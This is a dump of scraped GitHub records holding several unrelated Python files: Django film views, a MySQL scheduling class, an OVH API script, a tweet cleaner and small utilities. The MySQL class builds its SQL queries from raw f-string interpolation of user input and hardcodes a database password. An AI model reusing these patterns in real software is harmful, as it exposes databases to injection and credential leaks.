|
generate_data/DataBuilder.py
|
DataBuilder.py
|
py
| 4,326 |
python
|
en
|
code
| 0 |
github-code
|
6
|
2845548081
|
from django.shortcuts import render
from .models import Directores, Peliculas
def index (request):
directores = Directores.objects.all()
return render(request, 'index.html', context={
'directores': directores,
})
# Capture the ids variable passed in the URL
# The variable name must match the one declared in urls.py
def director (request, ids):
dtor = Directores.objects.filter(id = ids)
foto =''
nombre = ''
apellido = ''
nacimiento= ''
muerte = ''
pais = ''
biografia = ''
peliculas = Peliculas.objects.filter(director = ids)
for director in dtor:
foto = director.foto
nombre = director.nombre
apellido = director.apellido
nacimiento = director.nacimiento
if director.fallecimiento:
muerte = f' † {director.fallecimiento}'
else:
muerte = ''
pais = director.pais
biografia = director.biografia
return render(request, 'Details.html',context={
'nombre': nombre,
'apellido': apellido,
'fechas': f'{nacimiento} {muerte}',
'foto': foto,
'pais': pais,
'bio': biografia,
'peliculas' : peliculas
})
def pelicula (request, ids):
peliculas = Peliculas.objects.filter(id = ids)
    # Switch-style chain to resolve the genre's display name
genero = ''
for peli in peliculas:
if peli.genero == 'c':
genero = 'Comedia'
elif peli.genero == 'f':
genero = 'Ciencia Ficción'
elif peli.genero == 'd':
genero = 'Drama'
elif peli.genero == 't':
genero = 'Terror'
return render(request, 'pelis.html',context={
'peliculas': peliculas,
'genero': genero
})
|
Ranset/django_openbootcamp_exercise12
|
directores/views.py
|
views.py
|
py
| 1,805 |
python
|
es
|
code
| 0 |
github-code
|
6
|
314481349
|
# imports
import os
import numpy as np
import pandas as pd
import pymysql
from pandas.plotting import table
import matplotlib.pyplot as plt
from datetime import datetime
from util.Event import Event
from matplotlib import rc
font = {'family' : 'DejaVu Sans',
'weight' : 'normal',
'size' : 12}
rc('font', **font)
class IO:
def __init__(self, userName):
self.userName = userName
self.mysql = self.dbConnect()
self.events = self.queryUser()
def dbConnect(self):
mysql = pymysql.connect(database ='IOU_DB',
host='localhost',
user='noahf',
password='1')
return mysql
def queryUser(self):
'''
Method to return a list of Event objects with the given userName
'''
# TODO : change this to query the mysql database for the given username
# for now just read in a csv
#eventTable = pd.read_csv(os.path.join(os.getcwd(), 'EVENT_TABLE.csv'))
#eventTableByUser = eventTable[eventTable['UserName'] == self.userName]
query = f'''
SELECT *
FROM EVENT_TABLE
WHERE UserName='{self.userName}'
'''
eventTableByUser = pd.read_sql(query, self.mysql)
eventList = []
for ii, row in eventTableByUser.iterrows():
event = Event(row['UserName'], row['Event'], row['StartTime'], row['EndTime'], row['StartDate'])
eventList.append(event)
print(event)
return eventList
def writeNewEvent(self, table, event, start, end, startDate):
sqlcmd = f"""
INSERT INTO {table} VALUES {(self.userName, event, start, end, startDate)}
"""
print(sqlcmd)
cursor = self.mysql.cursor()
cursor.execute(sqlcmd)
self.mysql.commit()
def removeEvent(self, event, date):
sqlcmd = f"""
DELETE FROM EVENT_TABLE
WHERE UserName = '{self.userName}'
AND Event = '{event}'
AND StartDate = '{date}'
"""
cursor = self.mysql.cursor()
cursor.execute(sqlcmd)
self.mysql.commit()
def queryOweTable(self):
query = f"""
SELECT *
FROM OWE_TABLE
WHERE ower = '{self.userName}'
"""
oweTable = pd.read_sql(query, self.mysql)
print(oweTable)
if len(oweTable) > 0:
fig = plt.figure()
ax = plt.subplot(111, frame_on=False) # no visible frame
ax.xaxis.set_visible(False) # hide the x axis
ax.yaxis.set_visible(False) # hide the y axis
table(ax, oweTable, loc='best')
ax.set_title('Hourly Debt:', fontsize=14) #, pad=25
#fig.subplots_adjust(top=0.2)
return fig
else:
return "You don't have any debt!!"
def queryRequestTable(self):
query = f"""
SELECT *
FROM REQUESTS
WHERE Requestor != '{self.userName}'
"""
reqTable = pd.read_sql(query, self.mysql)
print(reqTable)
if len(reqTable) > 0:
fig = plt.figure()
ax = plt.subplot(111, frame_on=False) # no visible frame
ax.xaxis.set_visible(False) # hide the x axis
ax.yaxis.set_visible(False) # hide the y axis
table(ax, reqTable, loc='best')
ax.set_title('Requests from other Professors:', fontsize=14)
return fig
else:
return "There are no requests"
def addRequest(self, startDate, start, end, eventName):
sqlcmd = f"""
INSERT INTO REQUESTS VALUES {(self.userName, startDate, start, end, eventName)}
"""
print(self.userName, startDate, start, end, eventName)
sqlCheck = f"""
SELECT *
FROM EVENT_TABLE
WHERE UserName='{self.userName}'
AND StartDate='{startDate}'
AND StartTime='{start}'
AND EndTime='{end}'
AND Event='{eventName}'
"""
cursor = self.mysql.cursor()
print(pd.read_sql(sqlCheck, self.mysql))
if len(pd.read_sql(sqlCheck, self.mysql)) == 0:
raise ValueError('Please Enter Values for an existing event')
cursor.execute(sqlcmd)
self.mysql.commit()
def fulfill(self, eventName, eventDate, otherFirst, otherLast):
cursor = self.mysql.cursor()
# get other User name
getOtherUser = f"""
SELECT *
FROM USERNAME
WHERE FirstName='{otherFirst}'
AND LastName='{otherLast}'
"""
userInfo = pd.read_sql(getOtherUser, self.mysql)
otherUser = userInfo['UserName'].tolist()[0]
# first remove request from REQUEST table
sqlcmd = f"""
DELETE FROM REQUESTS
WHERE Requestor = '{otherUser}'
AND EventName = '{eventName}'
AND StartDate = '{eventDate}'
"""
cursor.execute(sqlcmd)
#self.mysql.commit()
# get event hours
eventsQuery = f"""
SELECT *
FROM EVENT_TABLE
WHERE UserName='{otherUser}'
AND Event='{eventName}'
AND StartDate='{eventDate}'
"""
print(eventsQuery)
events = pd.read_sql(eventsQuery, self.mysql)
if len(events) > 1:
raise ValueError('Duplicate Events!!! Exiting...')
print(events)
event = Event(events['UserName'].tolist()[0],
events['Event'].tolist()[0],
events['StartTime'].tolist()[0],
events['EndTime'].tolist()[0],
events['StartDate'].tolist()[0])
eventHrs = event.endTime - event.startTime
eventHrs = eventHrs.total_seconds()/3600 # convert eventHrs to hr float
# change username on the event in EVENT_TABLE
updateCmd = f"""
UPDATE EVENT_TABLE
SET UserName='{self.userName}'
WHERE UserName='{otherUser}'
AND Event='{eventName}'
AND StartDate='{eventDate}'
"""
print()
print("update comm: ", updateCmd)
print()
cursor.execute(updateCmd)
#self.mysql.commit()
# get relevant rows in OWE_TABLE and check figure out if you owe the otherUser
getOwes = f"""
SELECT *
FROM OWE_TABLE
WHERE owes='{otherUser}'
AND ower='{self.userName}'
"""
oweTable = pd.read_sql(getOwes, self.mysql)
if len(oweTable) > 0:
hoursOwed = oweTable['amount'].tolist()[0]
else:
hoursOwed = 0
# now calculate who owes what hours and insert
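        # Worked example (illustrative): if I owed you 2 h and I just covered
        # your 3 h event, my 2 h debt row is deleted and a conjugate row
        # records that you now owe me 1 h.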
if hoursOwed - eventHrs == 0:
deleteEvent = f"""
DELETE FROM OWE_TABLE
WHERE ower = '{self.userName}'
AND owes = '{otherUser}'
"""
cursor.execute(deleteEvent)
#self.mysql.commit()
elif hoursOwed - eventHrs < 0:
# first remove old owed hours
deleteEvent = f"""
DELETE FROM OWE_TABLE
WHERE ower = '{self.userName}'
AND owes = '{otherUser}'
"""
cursor.execute(deleteEvent)
#self.mysql.commit()
# then add new row with conjugate
addEvent = f"""
INSERT INTO OWE_TABLE VALUES {(otherUser, self.userName, eventHrs-hoursOwed)}
"""
cursor.execute(addEvent)
#self.mysql.commit()
else:
owesUpdate = f"""
UPDATE OWE_TABLE
SET amount='{hoursOwed-eventHrs}'
WHERE ower='{self.userName}'
AND owes='{otherUser}'
"""
cursor.execute(owesUpdate)
self.mysql.commit()
|
noahfranz13/IOU
|
util/IO.py
|
IO.py
|
py
| 8,566 |
python
|
en
|
code
| 1 |
github-code
|
6
|
41366711164
|
# -*- encoding: utf-8 -*-
import sys, argparse, json, ovh, re, datetime,configparser
from urllib import parse
def main(argv):
parser = argparse.ArgumentParser()
    parser.add_argument('--url','-u', help='URL received by email, of the form https://www.ovh.com/manager/#/useraccount/contacts/123456?tab=REQUESTS&token=monsupertoken')
args = parser.parse_args()
print(decodeUrl(args.url))
client= ovh.Client()
updateck(client)
idurl = decodeUrl(args.url)["id"]
tokenurl = decodeUrl(args.url)["token"]
#Test if ID is ready to accept
idstatus = client.get('/me/task/contactChange/{}'.format(idurl))
if idstatus["state"] == "validatingByCustomers":
result = client.post('/me/task/contactChange/{}/accept'.format(idurl),token=tokenurl)
print(result)
else:
print("La tache de changeContact : "+str(idurl)+" est en état "+idstatus["state"])
def decodeUrl(url=""):
# Decode the URL for Id and token for contactChange task
result = parse.parse_qs(parse.urlsplit(url).fragment)
id = re.findall('\d+',list(result.keys())[0])[0]
token = result["token"][0]
return({'id': str(id), 'token': str(token)})
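# Illustrative example (hypothetical id/token):
#   decodeUrl("https://www.ovh.com/manager/#/useraccount/contacts/123456?tab=REQUESTS&token=tok")
#   -> {'id': '123456', 'token': 'tok'}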
def getConsumerKey(client):
#Obtain Consumer Key for script
ck = client.new_consumer_key_request()
ck.add_recursive_rules(ovh.API_READ_WRITE, '/')
validation = ck.request()
print("Please visit %s to authenticate" % validation['validationUrl'])
input("and press Enter to continue...")
# Print nice welcome message
print("Welcome", client.get('/me')['firstname'])
return validation['consumerKey']
def updateck(client):
    # Refresh the consumer key (CK) in the ovh.conf file if needed
config = configparser.ConfigParser()
config.read('ovh.conf')
endpoint = config["default"]["endpoint"]
try:
client.get("/me")
    except (ovh.exceptions.NotCredential,ovh.exceptions.InvalidCredential): # if the consumer key is invalid, request a new one
config[endpoint]["consumer_key"]= getConsumerKey(client)
with open('ovh.conf', 'w') as configfile:
config.write(configfile)
    except Exception:
        print("Error unrelated to consumer-key authentication\nCheck the ovh.conf file")
        sys.exit(1)  # the bare 'quit' here was a no-op; exit explicitly instead
else:
print("Welcome", client.get('/me')['firstname'])
return True
if __name__ == "__main__":
main(sys.argv[1:])
|
FlorianKronos/ovh-api-scripts
|
acceptTranfert.py
|
acceptTranfert.py
|
py
| 2,376 |
python
|
en
|
code
| 0 |
github-code
|
6
|
27731604302
|
import pandas as pd
import numpy as np
import re
class loadCSV(object):
def __init__(self):
dataSet = [i.strip().split(",") for i in open('smileannotationsfinal.csv', 'r', encoding="utf8").readlines()]
for index, val in enumerate(dataSet):
if len(val) > 3:
dataSet[index] = [val[0], ','.join(val[1:len(val) - 1]), val[-1]]
dataSet[index][1] = cleanTweet(dataSet[index][1])
self.tweetDataFrame = pd.DataFrame(dataSet, columns=['ID', 'Tweet', 'Classifiation'])
def cleanTweet(tweet):
tweet = tweet.lower()
#Convert www.* or https?://* to URL
tweet = re.sub('((www\.[^\s]+)|(https?://[^\s]+))','URL',tweet)
#Convert @username to AT_USER
tweet = re.sub('@[^\s]+','AT_USER',tweet)
#Remove additional white spaces
tweet = re.sub('[\s]+', ' ', tweet)
#Replace #word with word
tweet = re.sub(r'#([^\s]+)', r'\1', tweet)
#trim
tweet = tweet.strip('\'"')
return tweet
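# Example (assumed behaviour of the rules above):
#   cleanTweet("@Bob check https://t.co/x   #wow :)")
#   -> "AT_USER check URL wow :)"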
def main():
csvData = loadCSV()
print(csvData.tweetDataFrame.head())
csvData.tweetDataFrame.to_csv('export.csv', sep=',', encoding='utf-8')
if __name__ == "__main__":
# calling main function
main()
|
thanapol2/twitter_python
|
loadCSV.py
|
loadCSV.py
|
py
| 1,202 |
python
|
en
|
code
| 0 |
github-code
|
6
|
18417538437
|
from typing import List
from functools import lru_cache
class Solution:
def canJump_top_down(self, nums: List[int]) -> bool:
n = len(nums)
@lru_cache(None)
def can_jump(i):
if i < 0 or i >= n:
return False
if i + nums[i] >= n - 1:
return True
return any(can_jump(k) for k in range(i + nums[i], i, -1))
return can_jump(0)
def canJump_greedy(self, nums: List[int]) -> bool:
n = len(nums)
max_jump = 0
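        # Greedy invariant: max_jump is the farthest index reachable using
        # only the prefix scanned so far; if i ever exceeds it, index i (and
        # therefore the end) is unreachable.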
for i in range(n):
if max_jump < i:
return False
max_jump = max(max_jump, i + nums[i])
if max_jump >= n - 1:
return True
return max_jump >= n - 1
## TC: O(n)
## SC: O(1)
s = Solution()
print(s.canJump_greedy([0]))  # the class defines canJump_greedy / canJump_top_down, not canJump
print(s.canJump_greedy([3, 2, 1, 0, 4]))
|
ace-wu/oj
|
leetcode/0055-jump-game.py
|
0055-jump-game.py
|
py
| 850 |
python
|
en
|
code
| 3 |
github-code
|
6
|
17767255083
|
from datetime import datetime
import uuid
class Order():
def __init__(self, order):
self.__dict__ = order
self.id = str(uuid.uuid4())
class RenderDishInfo():
def __init__(self, id, name, shelf, value, isPicked, isDecayed):
self.id = id
self.name = name
self.shelf = shelf
self.value = value
self.isPicked = isPicked
self.isDecayed = isDecayed
|
purifier1990/PythonLearn
|
kitchen/order.py
|
order.py
|
py
| 363 |
python
|
en
|
code
| 1 |
github-code
|
6
|
11779785900
|
from scripts.util import read_supertopics, SuperTopic, get_spottopics, DateFormat, read_temp_dist
from typing import Literal
import numpy as np
import json
from prettytable import PrettyTable
DATASET = 'climate2'
LIMIT = 7000000
DATE_FORMAT: DateFormat = 'monthly'
NORM: Literal['abs', 'col', 'row'] = 'abs'
BOOST = ['raw', # 0
'retweets', # 1
'replies', # 2
'likes', # 3
'retweets_likes', # 4
'replies_likes', # 5
'retweets_replies', # 6
'retweets_likes_replies' # 7
][0]
# SOURCE_DIR = f'data/{DATASET}/topics_big2'
# TWEETS_FILE = f'data/{DATASET}/tweets_filtered_{LIMIT}.jsonl'
# LABELS_FILE = f'{SOURCE_DIR}/labels_{LIMIT}_tsne.npy'
EPS = 1e-12
FILE_SUPERTOPICS = f'data/{DATASET}/topics_big2/supertopics.csv'
# FILE_TEMP_DIST = f'data/{DATASET}/topics_big2/temporal_sampled/{DATE_FORMAT}/temporal_{LIMIT}_{DATE_FORMAT}_{BOOST}_{NORM}.json'
FILE_TEMP_DIST = 'data/climate2/topics_big2/temporal_keep_majority/monthly/temporal_monthly_raw_abs.json'
print(FILE_TEMP_DIST)
groups, topics, distributions = read_temp_dist(FILE_TEMP_DIST)
annotations = read_supertopics(FILE_SUPERTOPICS)
spot_topics = get_spottopics(distributions, threshold=0.4, min_size=500)
# print(topics)
# print(distributions.sum(axis=0))
print(distributions.shape)
print(annotations.shape)
print(spot_topics.shape)
tab = PrettyTable(field_names=['supertopic', 'N topics', 'N spottopics', 'spots/topics',
'N tweets', 'N tweet spot', 'spottweets/tweets', 'avg tweets/topic (std)', 'max peak'])
for st in SuperTopic:
n_topics = annotations[:, st].sum()
n_spots = annotations[:, st][spot_topics].sum()
n_topic_tweets = distributions.T[annotations[:, st] > 0].sum()
mean_tweets_per_topic = distributions.T[annotations[:, st] > 0].mean()
std_tweets_per_topic = distributions.T[annotations[:, st] > 0].std()
n_spot_tweets = distributions.T[spot_topics][annotations[:, st][spot_topics] > 0].sum()
tab.add_row([st.name,
f'{n_topics} ({n_topics / distributions.shape[1]:.1%})',
f'{n_spots} ({n_spots / len(spot_topics):.1%})',
f'{n_spots / n_topics:.2%}',
f'{n_topic_tweets:,} ({n_topic_tweets / (distributions.sum() + EPS):.1%})',
f'{n_spot_tweets:,} ({n_spot_tweets / (distributions.T[spot_topics].sum() + EPS):.1%})',
f'{n_spot_tweets / n_topic_tweets:.1%}',
f'{mean_tweets_per_topic:.1f} ({std_tweets_per_topic:.1f})',
groups[distributions.T[annotations[:, st] > 0].sum(axis=0).argmax()]
])
tab.add_row(['TOTAL',
distributions.shape[1],
len(spot_topics),
'––',
f'{distributions.sum():,}',
f'{distributions.T[spot_topics].sum():,}',
f'{distributions.T[spot_topics].sum() / distributions.sum():.1%}',
f'{distributions.mean():.1f} ({distributions.std():.1f})',
groups[distributions.T.sum(axis=0).argmax()]
])
print(tab)
print('annotated topics:', sum(annotations.sum(axis=1) > 0))
print('num topics:', len(topics))
print('num spot topics:', len(spot_topics))
# when does each spot topic "peak"
r = []
for spt in spot_topics:
r.append((spt[0], groups[distributions.T[spt].argmax()]))
rs = sorted(r, key=lambda x: x[1])
print(rs)
|
TimRepke/twitter-climate
|
code/figures/supertopics/spot_topic_stats.py
|
spot_topic_stats.py
|
py
| 3,415 |
python
|
en
|
code
| 1 |
github-code
|
6
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.